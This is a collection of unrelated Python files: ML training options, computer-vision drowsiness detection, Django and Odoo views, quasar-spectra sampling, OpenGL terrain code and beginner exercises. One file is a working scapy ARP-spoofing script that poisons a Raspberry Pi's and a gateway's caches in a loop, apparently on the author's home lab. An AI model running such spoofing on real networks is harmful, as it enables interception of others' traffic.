parser.add_argument('-pretrained', default=None, help='Path to the pretrained model')
parser.add_argument('-resume', action='store_true', help='Whether continue to train from a previous checkpoint')
parser.add_argument('-nGPU', default=4, type=int, help='Number of GPUs for training')
parser.add_argument('-workers', default=8, type=int, help='Number of subprocesses to to load data')
parser.add_argument('-decay', default=8, type=int, help='LR decay')
parser.add_argument('-size', default=224, type=int)
parser.add_argument('-cutout', action='store_true', default=False, help='apply cutout')
parser.add_argument('-n_holes', type=int, default=1, help='number of holes to cut out from image')
parser.add_argument('-length', type=int, default=8,
help='length of the holes')
# disturb label options
parser.add_argument('-enable_disturb_label', default=False, help='Whether disturb label')
parser.add_argument('-noise_rate', default=0.1, type=float, help='noise rate for disturbing labels')
parser.add_argument('-mixup', action='store_true', default=False, help='apply mixup')
parser.add_argument('-save_result', action='store_true', default=False, help='save result when evaluating')
args = parser.parse_args()
|
from rif_cpp.numeric.pigen import *
|
#kullanıcıdan okunan sayının asal sayı olup olmadığını döndüren algoritma
n = int(input("bir sayı giriniz: "))
i = 3
asalmi = 1
if(n!=2 and n%2==0):
asalmi = 0
else:
while(i<=n**(1/2)):
if(n%i==0):
asalmi = 0
i += 2
if(asalmi == 1):
print("asal sayıdır")
else:
print("asal sayı değildir")
|
import sys
import time
spindle_current = 490
vacuum_table_current = 1234
air_quality_sensor = 2345
waste_sensor = 3453
dust_collector_power = True
air_quality_bad = False
waste_bin_full = True
spindle_warmed_up = True
diagnostics_template = """
+-------< spindle_current = {}mv
| +-----< vacuum_table_current = {}mv
| | +---< air_quality_sensor = {}mv
| | | +-< waste_sensor = {}mv
| | | |
+-+-+-+-+-+
| RasPi |
+-+-+-+-+-+
| | | |
| | | +-> dust_collector_power = {}
| | +---> air_quality_bad = {}
| +-----> waste_bin_full = {}
+-------> spindle_warmed_up = {}
"""
def multiply(a, b):
return a*b
def clear_screen():
sys.stdout.write("\x1b[2J\x1b[H")
def update_inputs():
global spindle_current
spindle_current += 1
def event_loop():
while True:
update_inputs()
update_dustcollector_power()
clear_screen()
display_diagnostics()
time.sleep(1.0) # pause for one second
def update_dustcollector_power():
global dust_collector_power
if spindle_current > 500:
dust_collector_power = True
else:
dust_collector_power = False
def display_diagnostics():
print diagnostics_template.format(
spindle_current,
vacuum_table_current,
air_quality_sensor,
waste_sensor,
dust_collector_power,
air_quality_bad,
waste_bin_full,
spindle_warmed_up,
)
if __name__ == '__main__':
event_loop() |
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from afriventapp.models import UserProfile
# def user_post_save(sender, **kwargs):
# if kwargs['created']:
# user_profile = UserProfile.objects.create(user=kwargs['instance'])
# post_save.connect(user_post_save, sender=User) |
#!/usr/bin/env python
"""
_ChangeState_
Sqlite implementation of Destroy for ThreadPool
"""
__all__ = []
from WMCore.Database.DBFormatter import DBFormatter
from WMCore.ThreadPool.MySQL.Destroy import Destroy as BaseDAO
class Destroy(BaseDAO):
def __init__(self):
BaseDAO.__init__(self)
self.delete["04tp_queued_process"] = "DROP TABLE tp_queued_process_enum"
|
import heapq
N, K = map( int, input().split())
H = [tuple( map( int, input().split())) for _ in range(N)]
ans = 0
heapq.heapify(H) #heap型にする
for _ in range(K):
M = heapq.heappop(H) #最小のものを取り出す
a, b = M[0], M[1]
ans += a
heapq.heappush(H,(a+b,b)) #加算したものをheapに追加する
print(ans)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import cv2
import dlib
import numpy
from scipy.spatial import distance as dist
from imutils import face_utils
# define two constants, one for the eye aspect ratio to indicate
# blink and then a second constant for the number of consecutive
# frames the eye must be below the threshold
EYE_AR_THRESH = 0.27
EYE_AR_CONSEC_FRAMES = 2
MOUTH_YA_CONSEC_FRAMES=9
MOUTH_YAWNING_THRESH=0.7
DAT_FILENAME = 'shape_predictor_68_face_landmarks.dat'
# grab the indexes of the facial landmarks for the left and
# right eye, respectively
(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS["left_eye"]
(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS["right_eye"]
(mStart,mEnd) = face_utils.FACIAL_LANDMARKS_IDXS["mouth"]
def eye_aspect_ratio(eye):
# compute the euclidean distances between the two sets of
# vertical eye landmarks (x, y)-coordinates
A = dist.euclidean(eye[1], eye[5])
B = dist.euclidean(eye[2], eye[4])
# compute the euclidean distance between the horizontal
# eye landmark (x, y)-coordinates
C = dist.euclidean(eye[0], eye[3])
# compute the eye aspect ratio
ear = (A + B) / (2.0 * C)
# return the eye aspect ratio
return ear
def detect_yanwing(mouth):
A=dist.euclidean(mouth[2],mouth[10])
B=dist.euclidean(mouth[3],mouth[9])
C=dist.euclidean(mouth[4],mouth[8])
D=dist.euclidean(mouth[0],mouth[6])
E=dist.euclidean(mouth[1],mouth[5])
F=dist.euclidean(mouth[11],mouth[7])
yanwing_ratio=(A+B+C)/(D+E+F)
return yanwing_ratio
def showPose(im, image_points):
# 3D model points.
model_points = numpy.array([
(0.0, 0.0, 0.0), # Nose tip
(0.0, -330.0, -65.0), # Chin
(-225.0, 170.0, -135.0), # Left eye left corner
(225.0, 170.0, -135.0), # Right eye right corne
(-150.0, -150.0, -125.0), # Left Mouth corner
(150.0, -150.0, -125.0) # Right mouth corner
])
# Camera internals
size=im.shape
focal_length = size[1]
center = (size[1]/2, size[0]/2)
camera_matrix = numpy.array(
[[focal_length, 0, center[0]],
[0, focal_length, center[1]],
[0, 0, 1]], dtype = "double"
)
#print ("Camera Matrix :",camera_matrix)
dist_coeffs = numpy.zeros((4,1)) # Assuming no lens distortion
(success, rotation_vector, translation_vector) = cv2.solvePnP(model_points, image_points, camera_matrix, dist_coeffs, flags=cv2.SOLVEPNP_ITERATIVE)
# Project a 3D point (0, 0, 1000.0) onto the image plane.
# We use this to draw a line sticking out of the nose
(nose_end_point2D, jacobian) = cv2.projectPoints(numpy.array([(0.0, 250, 800.0)]), rotation_vector, translation_vector, camera_matrix, dist_coeffs)
for p in image_points:
cv2.circle(im, (int(p[0]), int(p[1])), 3, (0,0,255), -1)
p1 = ( int(image_points[0][0]), int(image_points[0][1]))
p2 = ( int(nose_end_point2D[0][0][0]), int(nose_end_point2D[0][0][1]))
distance=dist.euclidean(p1,p2)
cv2.line(im, p1, p2, (255,0,0), 2)
return im ,distance
def process_frame(detector,predictor,gray_frame):
eyes_open = True
looking_forward = True
distance=0
frame = []
# detect faces in the grayscale frame
rects = detector(gray_frame, 0)
#print(rects)
# We now need to loop over each of the faces in the frame and
# then apply facial landmark detection to each of them
if len(rects) > 0:
for rect in rects:
# determine the facial landmarks for the face region, then
# convert the facial landmark (x, y)-coordinates to a NumPy
# array
shape = predictor(gray_frame, rect)
shape = face_utils.shape_to_np(shape)
image_points=numpy.array([
shape[30], # Nose tip
shape[8], # Chin
shape[45], # Left eye left corner
shape[36], # Right eye right corne
shape[54], # Left Mouth corner
shape[48] # Right mouth corner
], dtype='double')
frame, distance=showPose(gray_frame, image_points)
# extract the left and right eye coordinates, then use the
# coordinates to compute the eye aspect ratio for both eyes
leftEye = shape[lStart:lEnd]
rightEye = shape[rStart:rEnd]
mouth=shape[mStart:mEnd]
leftEAR = eye_aspect_ratio(leftEye)
rightEAR = eye_aspect_ratio(rightEye)
yawningRatio=detect_yanwing(mouth)
# average the eye aspect ratio together for both eyes
ear = (leftEAR + rightEAR) / 2.0
# compute the convex hull for the left and right eye, then
# visualize each of the eyes
leftEyeHull = cv2.convexHull(leftEye)
rightEyeHull = cv2.convexHull(rightEye)
mouthHull=cv2.convexHull(mouth)
cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)
cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)
cv2.drawContours(frame,[mouthHull],-1,(0,255,0),1)
# check to see if the eye aspect ratio is below the blink
# threshold, and if so, increment the blink frame ounter
# @TODO
# if yawningRatio>MOUTH_YAWNING_THRESH:
# mouthCounter+=1
# else:
# mouthCounter=0
# if mouthCounter>=MOUTH_YA_CONSEC_FRAMES:
# totalYawn+=1
# mouthCounter=0
# if lower, eyes are closed
if ear < EYE_AR_THRESH:
eyes_open = False
# # otherwise, the eye aspect ratio is not below the blink
# # threshold
# else:
# # if the eyes were closed for a sufficient number of
# # then increment the total number of blinks
# if COUNTER >= EYE_AR_CONSEC_FRAMES:
# TOTAL += 1
# # reset the eye frame counter
# COUNTER = 0
# draw the total number of blinks on the frame along with
# the computed eye aspect ratio for the frame
# if no rects, then looking away
print(distance)
if len(rects) > 0:
if distance < 200:
looking_forward = True
else:
looking_forward = False
else:
looking_forward = False
if len(frame) > 0:
cv2.putText(frame, "eyes open: {}".format(eyes_open), (10, 30),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
cv2.putText(frame, "EAR: {:.2f}".format(ear), (300, 30),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
cv2.putText(frame,"yawning:{}".format(3),(10,60),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
cv2.putText(frame, "looking ahead?: {}".format(looking_forward), (300, 60),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
#show the frame
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
return (eyes_open, looking_forward)
vc = cv2.VideoCapture(0)
vc.set(3,640)
vc.set(4,480)
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(DAT_FILENAME)
while True:
ret, frame = vc.read()
eyes_open,looking_forward=process_frame(detector,predictor,frame)
|
emails = ['me@hotmail.com','you@gmail.com','they@gmail.com']
# prints only gmail emails
for email in emails:
if 'gmail' in email:
print(email)
|
import sys
import json
import networkx as nx
def readInput(fp):
data = []
for line in open(fp, 'r', encoding='utf-8'):
data.append(json.loads(line))
return data
def writeOutput(fp, data):
with open(fp, 'w', encoding='utf-8') as outfile:
json.dump(data, outfile)
if __name__ == '__main__':
input_file = sys.argv[1]
gexf_output_file = sys.argv[2]
json_output_file = sys.argv[3]
# input_file = './Gamergate.json'
# input_file = './toy_test/mini_mid_gamergate.json'
# gexf_output_file = './gext_testout1.gexf'
# json_output_file = './json_testout1.json'
tweets = readInput(input_file)
G = nx.DiGraph()
for tweet in tweets:
if 'retweeted_status' not in tweet:
G.add_node(tweet['user']['screen_name'])
else:
if G.has_edge(tweet['user']['screen_name'], tweet['retweeted_status']['user']['screen_name']):
G[tweet['user']['screen_name']][tweet['retweeted_status']['user']['screen_name']]['weight'] += 1
else:
G.add_edge(tweet['user']['screen_name'], tweet['retweeted_status']['user']['screen_name'], weight = 1)
nx.write_gexf(G, gexf_output_file)
n_nodes, n_edges = G.number_of_nodes(), G.number_of_edges()
retweeted_list = sorted([(user, weight) for user, weight in G.in_degree(weight='weight')], key=lambda x: x[1], reverse=True)
max_retweeted_user = retweeted_list[0][0]
max_retweeted_number = retweeted_list[0][1]
retweeter_list = sorted([(user, weight) for user, weight in G.out_degree(weight='weight')], key=lambda x: x[1], reverse=True)
max_retweeter_user = retweeter_list[0][0]
max_retweeter_number = retweeter_list[0][1]
res = {}
res['n_nodes'] = n_nodes
res['n_edges'] = n_edges
res['max_retweeted_user'] = max_retweeted_user
res['max_retweeted_number'] = max_retweeted_number
res['max_retweeter_user'] = max_retweeter_user
res['max_retweeter_number'] = max_retweeter_number
writeOutput(json_output_file, res) |
# INTRODUCTION TO FUNCTIONS
# First user wants to travel between these two points!
print("Setting the Empire State Building as the starting point and Time Square as our destination.")
print("Calculating the total distance between our points.")
print("The best route is by train and will take approximately 10 minutes.")
# Second user wants to travel between these two points!
print("Setting the Empire State Building as the starting point and Time Square as our destination.")
print("Calculating the total distance between our points.")
print("The best route is by train and will take approximately 10 minutes.")
# Third user wants to travel between these two points!
print("Setting the Empire State Building as the starting point and Time Square as our destination.")
print("Calculating the total distance between our points.")
print("The best route is by train and will take approximately 10 minutes.")
# Fourth user wants to travel between these two points!
print("Setting the Empire State Building as the starting point and Time Square as our destination.")
print("Calculating the total distance between our points.")
print("The best route is by train and will take approximately 10 minutes.")
# Defining a Function
def directions_to_timesSq():
print("Walk 4 mins to 34th St Herald Square train station")
print("Take the Northbound N, Q, R, or W train 1 stop")
print("Get off the Times Square 42nd Street stop")
# Calling a Function
def directions_to_timesSq():
print("Walk 4 mins to 34th St Herald Square train station.")
print("Take the Northbound N, Q, R, or W train 1 stop.")
print("Get off the Times Square 42nd Street stop.")
print("Take lots of pictures!")
directions_to_timesSq()
# Whitespace & Execution Flow
# Write your code below!
print("Checking the weather for you!")
def weather_check():
print("Looks great outside! Enjoy your trip.")
print("False Alarm, the weather changed! There is a thunderstorm approaching. Cancel your plans and stay inside.")
weather_check()
# Parameters & Arguments
# Checkpoint 1 & 2
def generate_trip_instructions(location):
print("Looks like you are planning a trip to visit " + location)
print("You can use the public subway system to get to " + location)
# Checkpoint 3 & 4
#generate_trip_instructions("Central Park")
generate_trip_instructions("Grand Central Station")
# Multiple Parameters
def calculate_expenses(plane_ticket_price, car_rental_rate, hotel_rate , trip_time):
car_rental_total = car_rental_rate * trip_time
hotel_total = hotel_rate * trip_time - 10
print(car_rental_total + hotel_total + plane_ticket_price)
calculate_expenses(200, 100, 100, 5)
# Types of Arguments
def trip_planner(first_destination, second_destination, final_destination="Codecademy HQ"):
print("Here is what your trip will look like!")
print("First, we will stop in " + first_destination + ", then " + second_destination + ", and lastly " + final_destination)
trip_planner("France", "Germany", "Denmark")
trip_planner("Denmark", "France", "Germany")
trip_planner(first_destination="Iceland", final_destination="Germany", second_destination="India")
trip_planner("Brooklyn", "Queens")
# Built-in Functions vs User Defined Functions
tshirt_price = 9.75
shorts_price = 15.50
mug_price = 5.99
poster_price = 2.00
# Write your code below:
max_price = max(9.75, 15.50, 5.99, 2.00)
print(max_price)
min_price = min(9.75, 15.50, 5.99, 2.00)
print(min_price)
rounded_price = round(tshirt_price, 1)
print(rounded_price)
# Variable Access
favorite_locations = "Paris, Norway, Iceland"
# This function will print a hardcoded count of how many locations we have.
def print_count_locations():
print("There are 3 locations")
# This function will print the favorite locations
def show_favorite_locations():
print("Your favorite locations are: " + favorite_locations)
print_count_locations()
show_favorite_locations()
# Returns
current_budget = 3500.75
def print_remaining_budget(budget):
print("Your remaining budget is: $" + str(budget))
print_remaining_budget(current_budget)
# Write your code below:
def deduct_expense(budget, expense):
return budget - expense
shirt_expense = 9
new_budget_after_shirt = deduct_expense( current_budget, shirt_expense )
print_remaining_budget(new_budget_after_shirt)
# Multiple Returns
def top_tourist_locations_italy():
first = "Rome"
second = "Venice"
third = "Florence"
return first, second, third
most_popular1,most_popular2,most_popular3 = top_tourist_locations_italy()
print(most_popular1)
print(most_popular2)
print(most_popular3)
# Review
def trip_planner_welcome(name):
print("Welcome to tripplanner v1.0 " + name)
def destination_setup(origin, destination, estimated_time, mode_of_transport="Car"):
print("Your trip starts off in " + origin)
print("And you are traveling to " + destination)
print("You will be traveling by " + mode_of_transport)
print("It will take approximately " + str(estimated_time) + " hours")
def estimated_time_rounded(estimated_time):
rounded_time = round(estimated_time)
return rounded_time
# trip_planner_welcome(" <YOUR NAME HERE> ")
# estimate = estimated_time_rounded(2.43)
# destination_setup(" <PICK A ORIGIN> ", "<PICK A DESTINATION > ", estimate, "Car")
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import http
from odoo.http import request
from odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT
from datetime import date
class LibraryController(http.Controller):
@http.route('/library/statistics', type='json', auth='user')
def library_statistics(self):
Book = request.env['product.product']
Payment = request.env['library.payment']
Rental = request.env['library.rental']
first_day = date.today().replace(day=1).strftime(DEFAULT_SERVER_DATETIME_FORMAT)
last_day = date.today().strftime(DEFAULT_SERVER_DATETIME_FORMAT)
rental_month_domain = [('rental_date', '>=', first_day), ('rental_date', '<=', last_day)]
book_month_domain = [('date', '>=', first_day), ('date', '<=', last_day)]
lost_books = Rental.search([('state', '=', 'lost')] + rental_month_domain)
nb_rentals = Rental.search_count(rental_month_domain)
return {
'money_in': sum(Payment.search(book_month_domain).mapped('amount')),
'nb_rentals': nb_rentals,
'nb_lost_books': len(lost_books),
'money_lost': sum(lost_books.mapped('book_id').mapped('acquisition_price')),
'nb_available_books': Book.search_count([('book', '=', True), ('book_state', '=', 'available')]),
'nb_rented_books': Book.search_count([('book', '=', True), ('book_state', '=', 'rented')]),
'nb_lost_books_total': Book.search_count([('book', '=', True), ('book_state', '=', 'lost')]),
}
|
from django.db import models
class GroupBy(models.Aggregate):
template = '%(expressions)s'
def __init__(self, expression, **extra):
super(GroupBy, self).__init__(
expression,
output_field=models.TextField(),
**extra
)
def get_group_by_cols(self):
return self.source_expressions
|
import numpy as np
import random
import cv2
def default_char_factory():
return chr(random.choice(list(range(33, 126))))
def get_char(size, rate=2.3, char_factory=default_char_factory, func_show=None):
w, h = size
h = int(h / rate)
result = ''
for r in range(h):
for c in range(w):
show = True
if callable(func_show):
show = func_show(r, c)
char = char_factory() if show else ' '
result += char
if r != h - 1:
result += '\n'
return result
def img2char(data, size, rate=2.3, char_factory=default_char_factory):
w, h = size
copy = data.copy()
copy = cv2.cvtColor(copy, cv2.COLOR_BGR2GRAY)
threshold, copy = cv2.threshold(copy, 127, 255, cv2.THRESH_BINARY)
copy = cv2.resize(copy, (w, int(h / rate)))
copy[copy <= 0] = 0
copy[copy > 0] = 1
copy = copy.astype(np.float)
return get_char(size, rate, char_factory, func_show=lambda r, c: copy[r, c])
if __name__ == '__main__':
print get_char((100, 100))
import os
os.system('clear')
|
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.contrib.auth import authenticate
# Create your views here.
# Controller - business logic
from quizapp.models import Question
from django.shortcuts import render
def index(request):
questions_list = Question.objects.all()
return render(request, "quizapp/index.html", {'questions_list':questions_list})
def detail(request, question_id):
#Added comment
message = ""
is_correct = False
if request.method == "POST":
answer_id = int(request.POST.get("answer"))
# print(answer_id)
#question_id = request.POST.get("question_id")
print(answer_id, question_id)
question = Question.objects.get(id=question_id)
for answer in question.answer_set.all():
if answer.id == answer_id and answer.correct == True:
message = "correct answer"
is_correct = True
break
if not is_correct:
message = "wrong answer"
question = Question.objects.get(id=question_id)
return render(request, "quizapp/detail.html", {'question':question,'message':message,'result':is_correct})
def login(request):
message = ""
if request.method == "POST":
username = request.POST.get("username")
password = request.POST.get("password")
user = authenticate(username=username, password=password)
if user is None:
message = "Either username or password is wrong"
else:
#message = "Login successful"
return r
edirect('index')
return render(request,"quizapp/login.html",{'message': message})
|
#
# This script implements functions for maximum likelihood
# estimation of a basis for a group of Quasar Spectra.
#
# Roughly, this procedure is the following:
# - Resample spectra from lam_obs into rest frame grid lam0, (using Z_spec)
# - Fit optimize basis and weights in an NMF-like framework (with normal errors)
#
import fitsio
import autograd.numpy as np
import autograd.numpy.random as npr
from scipy.optimize import minimize
from redshift_utils import load_data_clean_split, project_to_bands, sinc_interp, \
check_grad, fit_weights_given_basis, \
evaluate_random_direction, \
resample_rest_frame, get_lam0
from CelestePy.util.infer.slicesample import slicesample
from CelestePy.util.infer.hmc import hmc
from quasar_fit_basis import load_basis_fit, make_functions
import GPy
import os, sys
import cPickle as pickle
def save_basis_samples(th_samps, ll_samps, lam0, lam0_delta, parser, chain_idx):
""" save basis fit info """
# grab B value for shape info
B = parser.get(th_samps[0,:], 'betas')
#dump separately - pickle is super inefficient
fbase = 'cache/basis_samples_K-%d_V-%d_chain_%d'%(B.shape[0], B.shape[1], chain_idx)
np.save(fbase + '.npy', th_samps)
with open(fbase + '.pkl', 'wb') as handle:
pickle.dump(ll_samps, handle)
pickle.dump(lam0, handle)
pickle.dump(lam0_delta, handle)
pickle.dump(parser, handle)
pickle.dump(chain_idx, handle)
def load_basis_samples(fname):
bname = os.path.splitext(fname)[0]
th_samples = np.load(bname + ".npy")
with open(bname + ".pkl", 'rb') as handle:
ll_samps = pickle.load(handle)
lam0 = pickle.load(handle)
lam0_delta = pickle.load(handle)
parser = pickle.load(handle)
chain_idx = pickle.load(handle)
return th_samples, ll_samps, lam0, lam0_delta, parser, chain_idx
def gen_prior(K_chol, sig2_omega, sig2_mu):
th = np.zeros(parser.N)
N = parser.idxs_and_shapes['mus'][1][0]
parser.set(th, 'betas', K_chol.dot(npr.randn(len(lam0), K)).T)
parser.set(th, 'omegas', np.sqrt(sig2_omega) * npr.randn(N, K))
parser.set(th, 'mus', np.sqrt(sig2_mu) * npr.randn(N))
return th
if __name__=="__main__":
##################################################################
## SET INPUT PARAMS
##################################################################
chain_idx = int(sys.argv[1]) if len(sys.argv) > 1 else 0
Nsamps = int(sys.argv[2]) if len(sys.argv) > 2 else 100
length_scale = float(sys.argv[3]) if len(sys.argv) > 3 else 40.
init_iter = int(sys.argv[4]) if len(sys.argv) > 4 else 100
K = 4
print "==== SAMPLING CHAIN ID = %d ============== "%chain_idx
print " Nsamps = %d "%Nsamps
print " length_scale = %2.2f"%length_scale
print " num init_iters = %d "%init_iter
print " K = %d "%K
##################################################################
## load a handful of quasar spectra and resample
##################################################################
lam_obs, qtrain, qtest = \
load_data_clean_split(spec_fits_file = 'quasar_data.fits',
Ntrain = 400)
N = qtrain['spectra'].shape[0]
## resample to lam0 => rest frame basis
lam0, lam0_delta = get_lam0(lam_subsample=10)
print " resampling de-redshifted data"
spectra_resampled, spectra_ivar_resampled, lam_mat = \
resample_rest_frame(qtrain['spectra'],
qtrain['spectra_ivar'],
qtrain['Z'],
lam_obs,
lam0)
# clean nans
X = spectra_resampled
X[np.isnan(X)] = 0
Lam = spectra_ivar_resampled
Lam[np.isnan(Lam)] = 0
###########################################################################
## Set prior variables (K_chol, sig2_omega, sig2_mu)
###########################################################################
sig2_omega = 1.
sig2_mu = 500.
beta_kern = GPy.kern.Matern52(input_dim=1, variance=1., lengthscale=length_scale)
K_beta = beta_kern.K(lam0.reshape((-1, 1)))
K_chol = np.linalg.cholesky(K_beta)
K_inv = np.linalg.inv(K_beta)
##########################################################################
## set up the likelihood and prior functions and generate a sample
##########################################################################
parser, loss_fun, loss_grad, prior_loss, prior_grad = \
make_functions(X, Lam, lam0, lam0_delta, K,
Kinv_beta = K_inv,
K_chol = K_chol,
sig2_omega = sig2_omega,
sig2_mu = sig2_mu)
# sample from prior
npr.seed(chain_idx + 42) # different initialization
th = np.zeros(parser.N)
parser.set(th, 'betas', .001 * np.random.randn(K, len(lam0)))
parser.set(th, 'omegas', .01 * npr.randn(N, K))
parser.set(th, 'mus', .01 * npr.randn(N))
#print "initial loss", loss_fun(th)
check_grad(fun = lambda th: loss_fun(th) + prior_loss(th), # X, Lam),
jac = lambda th: loss_grad(th) + prior_grad(th), #, X, Lam),
th = th)
###########################################################################
## optimize for about 350 iterations to get to some meaty part of the dist
###########################################################################
cache_fname = 'cache/basis_samples_K-4_V-1364_chain_%d.npy'%chain_idx
if True and os.path.exists(cache_fname):
print " initializing first sample from CACHE (pre-optimized)"
th_samples, _, _, _, _, _ = \
load_basis_samples(cache_fname)
th = th_samples[0, :]
else:
res = minimize(fun = lambda(th): loss_fun(th) + prior_loss(th),
jac = lambda(th): loss_grad(th) + prior_grad(th),
x0 = th,
method = 'L-BFGS-B',
options = {'gtol':1e-8, 'ftol':1e-8,
'disp':True, 'maxiter':init_iter})
th = res.x
##########################################################################
# Sample Nsamps, adapt step size
##########################################################################
# Sample basis and weights and magnitudes for the model
th_samps = np.zeros((Nsamps, len(th)))
ll_samps = np.zeros(Nsamps)
curr_ll = -loss_fun(th) - prior_loss(th)
print "Initial ll = ", curr_ll
print "{0:15}|{1:15}|{2:15}|{3:15}|{4:15}".format(
" iter ",
" lnpdf ",
" step_size ",
" accept rate ",
" num accepted")
step_sz = .0008
avg_accept_rate = .9
Naccept = 0
for n in range(Nsamps):
th, step_sz, avg_accept_rate = hmc(
U = lambda(th): -loss_fun(th) - prior_loss(th),
grad_U = lambda(th): -loss_grad(th) - prior_grad(th),
step_sz = step_sz,
n_steps = 20,
q_curr = th,
negative_log_prob = False,
adaptive_step_sz = True,
min_step_sz = 0.00005,
avg_accept_rate = avg_accept_rate,
tgt_accept_rate = .55)
## store sample
th_ll = -loss_fun(th) - prior_loss(th)
if th_ll != curr_ll:
Naccept += 1
curr_ll = -loss_fun(th) - prior_loss(th)
th_samps[n, :] = th
ll_samps[n] = curr_ll
if n % 10 == 0:
print "{0:15}|{1:15}|{2:15}|{3:15}|{4:15}".format(
" %d / %d "%(n, Nsamps),
" %2.4f"%ll_samps[n],
" %2.5f"%step_sz,
" %2.3f"%avg_accept_rate,
" %d "%Naccept)
if n % 200 == 0:
save_basis_samples(th_samps, ll_samps, lam0, lam0_delta, parser, chain_idx)
# write them out
save_basis_samples(th_samps, ll_samps, lam0, lam0_delta, parser, chain_idx)
|
import scapy.all as scapy
import time
import argparse
import sys
#spoofer function that works with scapy.send to create 'spoof' ARP packets to send to the victim
def spoofer(targetIP, spoofIP):
#targetIP - RPi IP, hwdst - RPi MAC Address, spoofIP - GatewayIP
packet=scapy.ARP(op=2,pdst=targetIP,hwdst='b8:27:eb:ee:a1:9f',psrc=spoofIP)
scapy.send(packet, verbose=False)
#restore function that works on keyboardInterrupt to allow stopping of sending of packets, by sending a scapy.send(packet with count = 4) (essentially an end request)
def restore(destinationIP, sourceIP):
#destinationIP - RPi IP, sourceIP - my laptop's IP, hwsrc - laptop MAC address
packet = scapy.ARP(op=2,pdst=destinationIP,hwdst='b8:27:eb:ee:a1:9f', psrc=sourceIP,hwsrc='f0:79:60:2a:eb:a6')
scapy.send(packet, count=4,verbose=False)
packets = 0
try:
while True:
#.227 - RPi address, 1.1 - gateway address
spoofer('192.168.1.227','192.168.1.1')
spoofer('192.168.1.1','192.168.1.227')
print("Sending packet number: " + str(packets)),
packets +=1
#sending a packet every 1 second
time.sleep(1)
except KeyboardInterrupt:
print("Sent " + str(packets) + " packets. Stopping now!")
restore('192.168.1.227','192.168.1.1')
restore('192.168.1.1','192.168.1.22') |
SCREEN_SIZE=(1280, 768)
DATA_SIZE=32
WORLD_HEIGHT=5
OPTS_ENABLE_NORMALS=True
OPTS_ENABLE_TEXTURES=True
OPTS_ENABLE_FACES=True
OPTS_ENABLE_LIGHTING=True
VERTEX_BUFFERS=10000
NORMAL_BUFFERS=20000
TEXTURE_BUFFERS=30000
from math import radians
from texgen.tools import *
from Image import *
from OpenGL.GL import *
from OpenGL.GLU import *
import numpy
import pygame
from pygame.locals import *
from gameobjects.matrix44 import *
from gameobjects.vector3 import *
texture = range(1)
class Image:
sizeX = 0
sizeY = 0
data = None
def ImageLoad(filename, image):
#PIL makes life easy...
poo = open(filename)
image.sizeX = poo.size[0]
image.sizeY = poo.size[1]
image.data = poo.tostring("raw", "RGBX", 0, -1)
# Load Bitmaps And Convert To Textures
def LoadGLTextures():
global texture
# Load Texture
image1 = Image()
ImageLoad("assets/grass_tex.jpg", image1)
# Create Textures
texture = glGenTextures(1)
# linear filtered texture
glBindTexture(GL_TEXTURE_2D, texture); # 2d texture (x and y size)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR); # scale linearly when image bigger than texture
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR); # scale linearly when image smalled than texture
glTexImage2D(GL_TEXTURE_2D, 0, 4, image1.sizeX, image1.sizeY, 0, GL_RGBA, GL_UNSIGNED_BYTE, image1.data);
def resize(width, height):
glViewport(0, 0, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(60.0, float(width)/height, .1, 1000.)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
def init():
LoadGLTextures(); # load the textures.
glEnable(GL_TEXTURE_2D)
glEnable(GL_DEPTH_TEST)
glShadeModel(GL_FLAT)
if not OPTS_ENABLE_FACES:
glCullFace(GL_BACK)
glPolygonMode(GL_BACK, GL_LINE)
glPolygonMode(GL_FRONT, GL_LINE)
glClearColor(0.5, 0.5, 1.0, 0.0)
glClearColor(0.0, 0.0, 0.0, 0.0)
glEnable(GL_COLOR_MATERIAL)
glEnable(GL_LIGHTING)
glEnable(GL_LIGHT0)
glLight(GL_LIGHT0, GL_POSITION, [20.0, 20.0, 0.0, 0.0])
glDepthFunc(GL_LEQUAL)
def bind_data_arrays(data, size):
world_width = 1.0
modifier = WORLD_HEIGHT
x_pos = 0.0
y_pos = 0.0
vertex_buffer = VERTEX_BUFFERS
normal_buffer = NORMAL_BUFFERS
texture_buffer = TEXTURE_BUFFERS
for x in range(len(data)-1):
row = []
tex = []
norms = []
for y in range(len(data[x])-1):
if (y % len(data)) == 0: y_pos = world_width
z_pos = (1.0/255.)*float(data[x][y])*modifier
z_pos_a = (1.0/255.)*float(data[x][y+1])*modifier
z_pos_b = (1.0/255.)*float(data[x+1][y])*modifier
z_pos_c = (1.0/255.)*float(data[x+1][y+1])*modifier
x_world = x_pos+world_width
y_world = y_pos+world_width
v1 = Vector3(x_pos, y_pos, z_pos)
v2 = Vector3(x_pos, y_world, z_pos_a)
v3 = Vector3(x_world, y_pos, z_pos_b)
v4 = Vector3(x_pos+world_width, y_pos+world_width, z_pos_c)
vector = v1+v2+v3+v4
n1, n2, n3 = vector.normalize().as_tuple()
norms += [n1, n2, n3]
norms += [n1, n2, n3]
norms += [n1, n2, n3]
norms += [n1, n2, n3]
tex += [x_pos, y_pos,
x_pos, y_world,
x_world, y_pos,
x_world, y_world]
row += [x_pos, y_pos, z_pos,
x_pos, y_world, z_pos_a,
x_world, y_pos, z_pos_b,
x_world, y_world, z_pos_c]
y_pos += world_width
x_pos += world_width
glBindBuffer(GL_ARRAY_BUFFER, vertex_buffer)
